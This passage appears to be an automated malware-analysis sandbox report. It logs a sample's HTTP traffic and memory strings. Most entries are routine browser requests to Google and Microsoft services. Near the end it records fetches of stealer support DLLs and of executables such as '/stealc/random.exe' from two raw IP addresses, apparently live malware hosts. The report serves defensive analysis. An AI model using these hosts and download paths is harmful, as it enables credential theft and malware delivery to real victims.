"Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:w4RW8X79OLP1lhTG5U-kYT8yZKnSNw:3U3fE25Sj1rlD-N2
Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76ACXN3GLzFgo4vjAm8qgvaycSbBf1NyhfiU3jRSTe8QWkjhjdrOWS7DzX4mFMwn9Z_r8QQzQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S86286635%3A1722009435752789&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:yI_OEUMu7IGbnCDihcwlWJkLhxv6TQ:XPid9P2CWoLMw6di
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEjXkpY1miL806lUCCtQlrHu-H96g/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74EGyOtYhtIedH616HDdleWeyvx-W5gVjR9WtunrFrzD7YvzKdhr32YF_YLRBX-ZKofQnLR HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:LYHKDd3zseErEFB9_nba7XBg1Is9-w:UN_hHMbC-ffQw73q
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76l5PHSkuJEfmntRfpXyKF9d2CZ3ZVNDVHTO0EGAn7_bo5ZGw98nP2MHND84A-DOFk_AEPt&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1609852158%3A1722009468052145&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic	HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB2MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHu1g2JNWjQ7Rsj1KTg1Ll6LPidEQ/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722614268&P2=404&P3=2&P4=aDBJmBRiu4bBgG0d5CtBgiCyasWY4s3e85vX9uilaJ5ZoJGUCP2ypk%2bTuDQrDjSoZ5e0N2ocgIZWMEShUpNIng%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: 1nTulnp8J4hLpQqiZr1rmMSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic	HTTP traffic detected: GET /generate_204?2GXXiw HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic	HTTP traffic detected: GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1Host: location.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/gen204/?tmambps=0.00006616961789375582&rtembps=-1&rttms=82&ct=undefined HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=eLtuQCG4EKOUiy_WkIWBEoarZIHSwG7qGlWLFpSQnVFe8D_MZ9msw9JLMJwj8x708HeKW6qgHSTPUcFjpzJ8ZYyqvyV3spkA26VZGF4EVJPCbE-E1tXgy8VtJWXjgpQJTmQfV6E2tDYD3sQA5CvGeAKYlXOoJRi2UpDnhZW-H8M
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache

Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
